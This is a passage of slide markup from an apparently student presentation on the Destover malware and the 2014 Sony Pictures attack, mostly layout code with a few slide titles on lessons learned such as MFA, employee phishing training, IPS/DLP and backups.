        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="215" name="Google Shape;215;p9"/>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216" name="Google Shape;216;p9"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="5400000">
              <a:off x="-75050" y="2503675"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="217" name="Google Shape;217;p9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="579525" y="261300"/>
            <a:ext cx="7980950" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="218" name="Google Shape;218;p9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="992600" y="542025"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="219" name="Google Shape;219;p9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="579525" y="261300"/>
              <a:ext cx="7567875" cy="4315050"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="172602" w="302715">
                  <a:moveTo>
                    <a:pt x="302715" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="302715" y="152801"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="291283" y="172602"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="172602"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln cap="flat" cmpd="sng" w="9525">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:round/>
              <a:headEnd len="med" w="med" type="oval"/>
              <a:tailEnd len="med" w="med" type="oval"/>
            </a:ln>
          </p:spPr>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="220" name="Google Shape;220;p9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1727190" y="4442730"/>
            <a:ext cx="971965" cy="161280"/>
            <a:chOff x="6413465" y="539505"/>
            <a:chExt cx="971965" cy="161280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="221" name="Google Shape;221;p9"/>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9"/>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9"/>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9"/>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5" name="Google Shape;225;p9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7044690" y="458868"/>
            <a:ext cx="971965" cy="161280"/>
            <a:chOff x="6413465" y="539505"/>
            <a:chExt cx="971965" cy="161280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="226" name="Google Shape;226;p9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7286403"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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6995146"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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6703889" y="539505"/>
              <a:ext cx="99027" cy="161280"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="161280" w="99027">
                  <a:moveTo>
                    <a:pt x="99027" y="161281"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="99027"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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6413465" y="539505"/>
              <a:ext cx="98195" cy="161280"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="161280" w="98195">
                  <a:moveTo>
                    <a:pt x="98195" y="161281"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="98195" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="806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0" name="Google Shape;230;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2135550" y="1517275"/>
            <a:ext cx="4872900" cy="135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8000"/>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2700"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2700"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2700"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2700"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2700"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2700"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2700"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8" rtl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2700"/>
              <a:buNone/>
              <a:defRPr/>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p/>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="Google Shape;231;p9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2135550" y="2955125"/>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32" name="Google Shape;232;p9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="122603" y="6"/>
            <a:ext cx="261257" cy="5143447"/>
            <a:chOff x="221120" y="-9"/>
            <a:chExt cx="454360" cy="3595559"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="233" name="Google Shape;233;p9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="667991" y="-9"/>
              <a:ext cx="7489" cy="3594728"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="3594728" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490"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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="581446" y="-9"/>
              <a:ext cx="7489" cy="1304377"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1304377" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1304378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="130437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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="581446" y="1467312"/>
              <a:ext cx="7489" cy="762341"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="762341" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="762342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="76234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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="581446" y="2411718"/>
              <a:ext cx="7489" cy="1183001"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1183001" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1183002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="118300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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="504887" y="-9"/>
              <a:ext cx="7489" cy="1833943"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1833943" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="1833943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="183394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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="504887" y="2066710"/>
              <a:ext cx="7489" cy="1528840"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1528840" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="1528840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="15288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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="442475" y="-9"/>
              <a:ext cx="7489" cy="1054974"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1054974" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="1054975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10549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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="442475" y="1266127"/>
              <a:ext cx="7489" cy="2328592"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2328592" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="2328593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="232859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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="371741" y="-9"/>
              <a:ext cx="7489" cy="2570513"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2570513" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="2570514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="25705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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="371741" y="2829052"/>
              <a:ext cx="7489" cy="766498"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="766498" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="766499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="7664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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288525" y="-9"/>
              <a:ext cx="7489" cy="1514707"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1514707" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1514708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="151470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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288525" y="1874670"/>
              <a:ext cx="7489" cy="1720049"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1720049" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1720049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="172004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9"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="221120" y="-9"/>
              <a:ext cx="7489" cy="3594728"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="3594728" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="3594728"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="35947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6" name="Shape 246"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="Google Shape;247;p10"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="pic"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-6650" y="-6650"/>
            <a:ext cx="9150600" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248" name="Google Shape;248;p10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720000" y="4133300"/>
            <a:ext cx="7704000" cy="4539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700"/>
              <a:buFont typeface="Albert Sans ExtraBold"/>
              <a:buNone/>
              <a:defRPr sz="27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PIVH-lMIUz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3.jpg"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.jpg"/><Relationship Id="rId8"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34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1396950" y="1518125"/>
            <a:ext cx="6350100" cy="156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Destover and the Sony Pictures Attack of 2014</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="897" name="Google Shape;897;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2307675" y="3149575"/>
            <a:ext cx="4528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Harrison Downs</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="898" name="Google Shape;898;p34"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2307600" y="3559750"/>
            <a:ext cx="4528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u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://youtu.be/PIVH-lMIUzc</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43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1006050" y="2130602"/>
            <a:ext cx="7131900" cy="8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latin typeface="Albert Sans ExtraBold"/>
                <a:ea typeface="Albert Sans ExtraBold"/>
                <a:cs typeface="Albert Sans ExtraBold"/>
                <a:sym typeface="Albert Sans ExtraBold"/>
              </a:rPr>
              <a:t>How Could This Have Been Avoided?</a:t>
            </a:r>
            <a:endParaRPr sz="3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44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1279494" y="629975"/>
            <a:ext cx="38085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latin typeface="Albert Sans"/>
                <a:ea typeface="Albert Sans"/>
                <a:cs typeface="Albert Sans"/>
                <a:sym typeface="Albert Sans"/>
              </a:rPr>
              <a:t>MFA, AAA Server</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:latin typeface="Albert Sans"/>
              <a:ea typeface="Albert Sans"/>
              <a:cs typeface="Albert Sans"/>
              <a:sym typeface="Albert Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1021" name="Google Shape;1021;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1279494" y="1387974"/>
            <a:ext cx="3808500" cy="3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RATs used insecure authentication</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1022" name="Google Shape;1022;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4056006" y="2003879"/>
            <a:ext cx="3808500" cy="768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3200">
                <a:latin typeface="Albert Sans"/>
                <a:ea typeface="Albert Sans"/>
                <a:cs typeface="Albert Sans"/>
                <a:sym typeface="Albert Sans"/>
              </a:rPr>
              <a:t>Employee Training</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:latin typeface="Albert Sans"/>
              <a:ea typeface="Albert Sans"/>
              <a:cs typeface="Albert Sans"/>
              <a:sym typeface="Albert Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1023" name="Google Shape;1023;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4056006" y="2764450"/>
            <a:ext cx="3808500" cy="37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Susceptible to phishing attacks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1024" name="Google Shape;1024;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1279494" y="3377783"/>
            <a:ext cx="38085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latin typeface="Albert Sans"/>
                <a:ea typeface="Albert Sans"/>
                <a:cs typeface="Albert Sans"/>
                <a:sym typeface="Albert Sans"/>
              </a:rPr>
              <a:t>IPS / DLP, Backups</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3200">
              <a:latin typeface="Albert Sans"/>
              <a:ea typeface="Albert Sans"/>
              <a:cs typeface="Albert Sans"/>
              <a:sym typeface="Albert Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1025" name="Google Shape;1025;p44"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1279494" y="4140925"/>
            <a:ext cx="3808500" cy="3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 to no automated threat response</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Google Shape;1026;p44" title="Desktop computer monochrome clip art | Free SVG"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5298625" y="1299850"/>
            <a:ext cx="758000" cy="758000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1027" name="Google Shape;1027;p44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5234775" y="521375"/>
            <a:ext cx="885708" cy="506952"/>
          </a:xfrm>
          <a:prstGeom prst="cloud">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF">
              <a:alpha val="202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descr="Public Domain Clip Art Image | database symbol | ID ..." id="1028" name="Google Shape;1028;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6490294" y="1462387"/>
            <a:ext cx="392006" cy="432926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Public Domain Clip Art Image | database symbol | ID ..." id="1029" name="Google Shape;1029;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7329869" y="558387"/>
            <a:ext cx="392006" cy="432926"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Vector image of pallet of bricks | Free SVG" id="1030" name="Google Shape;1030;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6514150" y="521372"/>
            <a:ext cx="344299" cy="506950"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1031" name="Google Shape;1031;p44"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1026" idx="0"/>
            <a:endCxn id="1027" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5677625" y="1027750"/>
            <a:ext cx="0" cy="272100"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1032" name="Google Shape;1032;p44"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1027" idx="0"/>
            <a:endCxn id="1030" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6119745" y="774851"/>
            <a:ext cx="394500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="19050">
            <a:solidFill>
              <a:schemeClr val="dk1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1033" name="Google Shape;1033;p44"/>
